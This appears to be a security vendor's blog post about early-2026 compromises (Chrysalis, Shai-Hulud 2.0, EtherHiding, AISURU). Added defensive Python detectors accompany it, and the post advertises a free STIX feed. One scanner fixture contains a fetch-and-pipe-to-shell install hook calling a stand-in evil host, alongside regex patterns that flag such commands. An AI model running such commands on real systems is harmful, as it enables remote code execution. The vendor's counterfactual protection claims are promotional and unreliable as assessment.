
# Who Got Popped: The Victims We Could Have Saved


**Published:** February 10, 2026

**Author:** Patrick Duggan




The Casualties



This week's threat landscape left bodies. Real organizations. Real data. Real damage.


Here's who got hit - and why it didn't have to happen.




Notepad++ / Chrysalis (Lotus Blossom)



**Attack window:** June - December 2025


**Public disclosure:** February 2, 2026


**Our coverage:** February 2, 2026 (same day)


The Victims



A government organization in the Philippines. A financial organization in El Salvador. An IT service provider in Vietnam. Additional targets in Australia.


A Chinese APT called Lotus Blossom compromised the Notepad++ update infrastructure and pushed a backdoor called Chrysalis to "fewer than two dozen" highly targeted machines.


Government. Finance. Critical IT.


The backdoor supports persistence via service creation, can spawn reverse shells, transfer files, and fully remove itself when done.
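Service creation is the loudest of those four behaviours, because Windows logs every new service (System log, Event ID 7045). The following is an added example, not code from this post or from any vendor write-up of Chrysalis: it scores 7045 records exported as JSON lines and flags services whose binary lives in user-writable space or that masquerade as a system host binary outside System32. The field names follow the 7045 event's own data items; the records themselves are constructed, not telemetry from the incident.

```python
"""Flag suspicious Windows service installations (System log Event ID 7045).

Added example, not code from the original post. Assumes 7045 events exported
to JSON lines with the fields shown in the constructed sample below.
"""
import json
import re

# Constructed sample records, not real telemetry from any incident.
SAMPLE_EVENTS = r"""
{"EventID": 7045, "Computer": "WS01", "ServiceName": "Dnscache", "ImagePath": "C:\\Windows\\System32\\svchost.exe -k NetworkService", "StartType": "auto start", "AccountName": "LocalSystem"}
{"EventID": 7045, "Computer": "WS01", "ServiceName": "UpdateHelper", "ImagePath": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\updsvc.exe", "StartType": "auto start", "AccountName": "LocalSystem"}
{"EventID": 7045, "Computer": "WS02", "ServiceName": "WinDefendSvc", "ImagePath": "C:\\ProgramData\\Microsoft\\Windows\\svchost.exe", "StartType": "auto start", "AccountName": "LocalSystem"}
{"EventID": 7045, "Computer": "WS02", "ServiceName": "gupdate", "ImagePath": "\"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /svc", "StartType": "auto start", "AccountName": "LocalSystem"}
{"EventID": 7036, "Computer": "WS02", "ServiceName": "gupdate", "ImagePath": "", "StartType": "", "AccountName": ""}
"""

# Roots where a freshly created auto-start service binary is unusual.
# Assumed heuristic: any of these paths deserves an analyst's eyes.
USER_WRITABLE = re.compile(
    r"^(?:[A-Z]:\\Users\\|[A-Z]:\\ProgramData\\|[A-Z]:\\Windows\\Temp\\|[A-Z]:\\Temp\\|\\\\)",
    re.IGNORECASE,
)
# System host binaries that are legitimate in System32 and suspicious anywhere else.
LOLBIN_NAMES = {"svchost.exe", "rundll32.exe", "regsvr32.exe", "powershell.exe", "cmd.exe"}


def binary_path(image_path: str) -> str:
    """Strip quoting and arguments from a service ImagePath to get the executable."""
    p = image_path.strip()
    if p.startswith('"'):
        return p[1:].split('"', 1)[0]
    return p.split(" ", 1)[0]


def classify(event: dict) -> list[str]:
    """Return the reasons a 7045 event looks suspicious (empty list = benign)."""
    reasons = []
    if event.get("EventID") != 7045:
        return reasons
    exe = binary_path(event.get("ImagePath", ""))
    if USER_WRITABLE.match(exe):
        reasons.append("binary in user-writable or UNC path")
    name = exe.rsplit("\\", 1)[-1].lower()
    if name in LOLBIN_NAMES and not exe.lower().startswith("c:\\windows\\system32\\"):
        reasons.append(f"{name} outside System32 (masquerading)")
    return reasons


def find_suspicious_services(raw_events: str) -> list[tuple[str, str, list[str]]]:
    """Scan JSON-lines event export; return (host, service name, reasons) per hit."""
    hits = []
    for line in raw_events.strip().splitlines():
        ev = json.loads(line)
        reasons = classify(ev)
        if reasons:
            hits.append((ev["Computer"], ev["ServiceName"], reasons))
    return hits


if __name__ == "__main__":
    for host, svc, why in find_suspicious_services(SAMPLE_EVENTS):
        print(f"{host}: service '{svc}' -> {'; '.join(why)}")
```

On the constructed sample this flags UpdateHelper (binary under a user profile) and WinDefendSvc (an svchost.exe that is not the real one) and stays quiet on Dnscache and Google's updater. Run it against the 7045 events of the attack window, not just today's, since the page puts the compromise months before disclosure.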




dYdX / Shai-Hulud 2.0 (npm Supply Chain)



**Attack window:** July 2025 - January 2026


**Downloads:** 121,539 across 128 trojanized packages


What They Stole



581 GitHub Personal Access Tokens. 386 GitHub OAuth Tokens. 104 GitHub Fine-Grained PATs. 101 GitLab Tokens.


That's 1,172 developer credentials harvested from one campaign.


If the malware couldn't steal credentials, it attempted to destroy the victim's entire home directory by securely overwriting and deleting every writable file.


PostHog was specifically mentioned as impacted by the spread.
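Trojanized npm packages get their code executed through install-time lifecycle hooks, so the cheapest tripwire is to enumerate every preinstall/install/postinstall script in a dependency tree and diff it against what you expect. The scanner below is an added example, not the post's "Pattern 38" logic or any vendor's: the node_modules tree is constructed in memory as {path: package.json text} (on a real host you would walk node_modules with os.walk), and the red-flag patterns are illustrative heuristics, not indicators published for this campaign.

```python
"""Scan an npm dependency tree for install-time lifecycle hooks.

Added example, not the post's detection logic. The tree is constructed in
memory; the RED_FLAGS patterns are assumed heuristics for install scripts
that a library has no business running.
"""
import json
import re

# Constructed node_modules, not a real package set.
SAMPLE_TREE = {
    "node_modules/left-pad/package.json": json.dumps(
        {"name": "left-pad", "version": "1.3.0"}),
    "node_modules/esbuild/package.json": json.dumps(
        {"name": "esbuild", "version": "0.21.0",
         "scripts": {"postinstall": "node install.js"}}),
    "node_modules/@acme/colors/package.json": json.dumps(
        {"name": "@acme/colors", "version": "9.9.1",
         "scripts": {"preinstall": "node setup_bun.js", "test": "jest"}}),
    "node_modules/tiny-util/package.json": json.dumps(
        {"name": "tiny-util", "version": "2.0.4",
         "scripts": {"postinstall": "curl -s https://evil.example/x | sh"}}),
}

# Hooks npm runs when a dependency is installed from the registry.
HOOKS = ("preinstall", "install", "postinstall")
# Shapes that have no business in a library's install hook (assumed heuristics).
RED_FLAGS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)"), "pipes download to shell"),
    (re.compile(r"\bbun\b|setup_bun"), "bootstraps alternate JS runtime (bun)"),
    (re.compile(r"base64\s+(-d|--decode)"), "decodes base64 at install"),
    (re.compile(r"\b(powershell|cmd\.exe)\b"), "spawns Windows shell"),
]


def inspect_package(path: str, manifest: str) -> list[dict]:
    """Return one finding per install hook; 'high' when a red flag matches, else 'review'."""
    pkg = json.loads(manifest)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        flags = [why for rx, why in RED_FLAGS if rx.search(cmd)]
        findings.append({
            "path": path,
            "package": f"{pkg['name']}@{pkg['version']}",
            "hook": hook,
            "cmd": cmd,
            "flags": flags,
            "severity": "high" if flags else "review",
        })
    return findings


def scan_tree(tree: dict[str, str]) -> list[dict]:
    """Walk every package.json in the tree (sorted for stable output)."""
    out = []
    for path, manifest in sorted(tree.items()):
        if path.endswith("package.json"):
            out.extend(inspect_package(path, manifest))
    return out


if __name__ == "__main__":
    for f in scan_tree(SAMPLE_TREE):
        print(f["severity"], f["package"], f["hook"], "->", f["cmd"], f["flags"])
```

Every hook, flagged or not, is reported: a legitimate native-build postinstall (esbuild's, in the sample) still deserves a baseline entry, because the worm's whole trick is to hide in a package you already trusted. Pair the scan with `npm ci --ignore-scripts` in CI and you remove the execution path entirely.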




EtherHiding npm Packages



**Disclosed:** February 8, 2026


**Our coverage:** December 28, 2025 (six weeks early)


54 malicious npm packages using Ethereum smart contracts as C2 dead drops.


The technique makes a takedown of the C2 itself impossible. You can't seize an Ethereum smart contract. What remains is the read path: the loader still has to reach a public RPC endpoint to fetch the pointer, and the next stage still has to be hosted on an ordinary server.


We published the staging IP (193.24.123.68) and the detection logic ("hunt for Ethereum RPC traffic from web servers") six weeks before the mainstream coverage.
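That detection logic, written out as an added example (not the post's own hunt query): it walks egress proxy logs and flags any host in the web-server subnet that sends an Ethereum JSON-RPC request, or that touches the staging IP named above. The log lines are constructed; the server subnet, the log field names and the list of public RPC providers are assumptions to be replaced with your own, while 193.24.123.68 is the address the post itself publishes.

```python
"""Hunt for Ethereum JSON-RPC calls originating from web servers.

Added example, not the post's own detection code. Assumes egress proxy logs
exported as JSON lines with the fields in the constructed sample; SERVER_NETS
and KNOWN_RPC_HOSTS are illustrative placeholders.
"""
import ipaddress
import json
from typing import Optional

# Constructed sample: three web servers (10.20.0.0/24) and one laptop (10.50.7.2).
SAMPLE_LOG = r"""
{"ts":"2026-02-08T10:01:02Z","src":"10.20.0.11","dst_host":"registry.npmjs.org","dst_ip":"104.16.0.10","method":"GET","path":"/lodash","body":""}
{"ts":"2026-02-08T10:01:09Z","src":"10.20.0.11","dst_host":"mainnet.infura.io","dst_ip":"104.18.2.1","method":"POST","path":"/v3/abc","body":"{\"jsonrpc\":\"2.0\",\"method\":\"eth_call\",\"params\":[{\"to\":\"0xdeadbeef\",\"data\":\"0x20965255\"},\"latest\"],\"id\":1}"}
{"ts":"2026-02-08T10:02:30Z","src":"10.20.0.12","dst_host":"193.24.123.68","dst_ip":"193.24.123.68","method":"GET","path":"/stage2.js","body":""}
{"ts":"2026-02-08T10:03:00Z","src":"10.20.0.13","dst_host":"api.github.com","dst_ip":"140.82.112.5","method":"GET","path":"/repos","body":""}
{"ts":"2026-02-08T10:04:00Z","src":"10.50.7.2","dst_host":"eth.llamarpc.com","dst_ip":"1.2.3.4","method":"POST","path":"/","body":"{\"jsonrpc\":\"2.0\",\"method\":\"eth_blockNumber\",\"params\":[],\"id\":1}"}
"""

SERVER_NETS = [ipaddress.ip_network("10.20.0.0/24")]  # assumed web-server subnet
KNOWN_RPC_HOSTS = {"mainnet.infura.io", "eth.llamarpc.com", "rpc.ankr.com",
                   "cloudflare-eth.com"}  # illustrative, not exhaustive
# Methods a dead-drop loader uses to read a contract; eth_call is the classic one.
READ_METHODS = {"eth_call", "eth_getStorageAt", "eth_getCode", "eth_getLogs"}
STAGING_IOCS = {"193.24.123.68"}  # staging IP from the post


def is_server(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SERVER_NETS)


def rpc_method(body: str) -> Optional[str]:
    """Return the JSON-RPC method name if the request body is a JSON-RPC 2.0 call."""
    if not body:
        return None
    try:
        msg = json.loads(body)
    except json.JSONDecodeError:
        return None
    if isinstance(msg, dict) and msg.get("jsonrpc") == "2.0" and isinstance(msg.get("method"), str):
        return msg["method"]
    return None


def hunt(raw_log: str) -> list[dict]:
    """Return one finding per suspicious request from a web server."""
    findings = []
    for line in raw_log.strip().splitlines():
        rec = json.loads(line)
        if not is_server(rec["src"]):
            continue  # workstations talking to chains are a different question
        method = rpc_method(rec["body"])
        if method in READ_METHODS or (method and rec["dst_host"] in KNOWN_RPC_HOSTS):
            findings.append({"src": rec["src"], "dst": rec["dst_host"],
                             "why": f"Ethereum RPC {method} from web server"})
        elif rec["dst_ip"] in STAGING_IOCS:
            findings.append({"src": rec["src"], "dst": rec["dst_ip"],
                             "why": "contact with known staging IP"})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f)
```

The body match matters more than the host list: EtherHiding loaders can be pointed at any RPC provider, so a hunt keyed only on known provider hostnames will miss the next campaign, while a JSON-RPC 2.0 envelope carrying eth_call from a web tier is anomalous regardless of destination.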




AISURU/Kimwolf DDoS (31.4 Tbps)



**Record-setting attack:** November 2025


**Botnet size:** 2-4 million compromised Android devices


Hong Kong jumped to the second most DDoS'd location on earth. The United Kingdom jumped 36 places to number six. Telecom, gaming, and generative AI companies were primary targets.


The "Night Before Christmas" campaign starting December 19 averaged 4 Tbps per attack.




The Counterfactual



What if these organizations had been consuming our feed?


**Chrysalis:** We had same-day coverage. They would have had IOCs to block before lateral movement completed.


**EtherHiding:** We had it six weeks early. They would have had 193.24.123.68 blocked and RPC detection deployed before the npm packages even shipped.


**Shai-Hulud 2.0:** We named the worm. Pattern 38 detection would have flagged trojanized packages.


**DPRK tradecraft:** Ongoing coverage. Blockchain C2 detection before it spread.


The Philippines government organization that got hit by Chrysalis? The El Salvador financial institution? The Vietnamese IT provider?


If they had our STIX feed, they would have had detection guidance before public disclosure.


The dYdX developers who lost 581 GitHub PATs? Our December Shai-Hulud coverage included the exact persistence mechanisms and exfiltration patterns.




The Cost Comparison



Enterprise threat intel platforms cost $50,000 to $500,000 per year. Curated. Delayed. Behind an NDA.


Our STIX feed costs nothing. Real-time. 1,671 malicious IPs. 256 botnet C2s. Free.


Our blog costs nothing. Detection guidance, IOCs, context. Free.


Our search API costs nothing. 329,442 documents indexed. Free.


The Philippines government org didn't need a half-million dollar Recorded Future contract.


They needed to hit analytics.dugganusa.com/api/v1/stix-feed.


That's it. Free. No authentication. Machine-readable.




Get Protected Now



STIX 2.1 Feed: analytics.dugganusa.com/api/v1/stix-feed


Search API: analytics.dugganusa.com/api/v1/search


Epstein Files: epstein.dugganusa.com


Current coverage: 1,671 malicious IPs, 256 botnet C2s, 1,151 indicators in the last 24 hours, 329,442 documents indexed.


No paywall. No enterprise contract. No sales call.


Just the feed.
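Consuming the feed means parsing STIX 2.1 indicator patterns into something a firewall can load, and an unauthenticated feed is untrusted input: fetch it over HTTPS and vet every entry before it becomes a block rule. The following is an added example, not the feed's own client code; it parses a constructed bundle embedded in place of a live fetch of analytics.dugganusa.com/api/v1/stix-feed, drops revoked and expired indicators, and refuses any address outside global unicast space so a poisoned or careless entry cannot null-route your own resolvers. The IPs in the sample are documentation ranges plus the staging address the post names, not live indicators from the feed.

```python
"""Turn a STIX 2.1 indicator bundle into a vetted IPv4 blocklist.

Added example, not the feed's own client. The bundle below is constructed;
a real run would fetch the feed over HTTPS and pass the response body to
blocklist_from_bundle().
"""
import ipaddress
import json
import re
from datetime import datetime, timezone

# Constructed sample bundle (documentation ranges plus the post's staging IP).
SAMPLE_BUNDLE = json.dumps({
    "type": "bundle", "id": "bundle--00000000-0000-4000-8000-000000000001",
    "objects": [
        {"type": "indicator", "id": "indicator--1", "spec_version": "2.1", "pattern_type": "stix",
         "pattern": "[ipv4-addr:value = '193.24.123.68']",
         "valid_from": "2026-02-01T00:00:00Z", "labels": ["staging"]},
        {"type": "indicator", "id": "indicator--2", "spec_version": "2.1", "pattern_type": "stix",
         "pattern": "[ipv4-addr:value = '198.51.100.9'] OR [ipv4-addr:value = '198.51.100.10']",
         "valid_from": "2026-01-01T00:00:00Z", "valid_until": "2026-01-15T00:00:00Z"},
        {"type": "indicator", "id": "indicator--3", "spec_version": "2.1", "pattern_type": "stix",
         "pattern": "[ipv4-addr:value = '10.0.0.53']", "valid_from": "2026-02-01T00:00:00Z"},
        {"type": "indicator", "id": "indicator--4", "spec_version": "2.1", "pattern_type": "stix",
         "pattern": "[ipv4-addr:value = '192.0.2.44']", "valid_from": "2026-02-01T00:00:00Z",
         "revoked": True},
        {"type": "indicator", "id": "indicator--5", "spec_version": "2.1", "pattern_type": "stix",
         "pattern": "[domain-name:value = 'example.net']", "valid_from": "2026-02-01T00:00:00Z"},
        {"type": "malware", "id": "malware--1", "spec_version": "2.1",
         "name": "Chrysalis", "is_family": True},
    ],
})

# Matches each ipv4-addr comparison inside a STIX pattern, including OR'd ones.
IPV4_IN_PATTERN = re.compile(r"ipv4-addr:value\s*=\s*'([^']+)'")


def parse_ts(s: str) -> datetime:
    """STIX timestamps are RFC 3339 in UTC with a trailing Z."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


FIXED_NOW = parse_ts("2026-02-10T00:00:00Z")  # the post's publication date, for repeatable runs


def blocklist_from_bundle(bundle_json: str, now: datetime) -> tuple[set[str], list[str]]:
    """Return (IPv4 blocklist, rejection reasons). Only global unicast IPv4 survives."""
    bundle = json.loads(bundle_json)
    if bundle.get("type") != "bundle":
        raise ValueError("not a STIX bundle")
    allowed, rejected = set(), []
    for obj in bundle.get("objects", []):
        if obj.get("type") != "indicator" or obj.get("pattern_type", "stix") != "stix":
            continue  # malware, relationships, sightings carry no block rule
        if obj.get("revoked"):
            rejected.append(f"{obj['id']}: revoked")
            continue
        if "valid_until" in obj and parse_ts(obj["valid_until"]) <= now:
            rejected.append(f"{obj['id']}: expired")
            continue
        for value in IPV4_IN_PATTERN.findall(obj.get("pattern", "")):
            try:
                addr = ipaddress.IPv4Address(value)
            except ValueError:
                rejected.append(f"{obj['id']}: malformed {value!r}")
                continue
            # RFC 1918, loopback, link-local or documentation space in a blocklist
            # means either a feed error or a poisoned feed; either way, never load it.
            if not addr.is_global:
                rejected.append(f"{obj['id']}: non-global {value}")
                continue
            allowed.add(str(addr))
    return allowed, rejected


if __name__ == "__main__":
    ips, why = blocklist_from_bundle(SAMPLE_BUNDLE, FIXED_NOW)
    print("block:", sorted(ips))
    print("rejected:", why)
```

Pass `datetime.now(timezone.utc)` instead of FIXED_NOW in production, keep the rejection list in your logs (a feed that suddenly starts emitting non-global addresses is itself a signal), and re-run on every pull so expiries and revocations actually retire rules.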




The Bottom Line



Organizations got compromised this month because they didn't have threat intel.


Not because threat intel didn't exist.


Not because it was too expensive.


Because nobody told them the best feed in the world is free.


Now you know.




*DugganUSA LLC - $75/month infrastructure. Free to the world.*


*"The feed exists. Use it."*





*Her name was Renee Nicole Good.*


*His name was Alex Jeffery Pretti.*
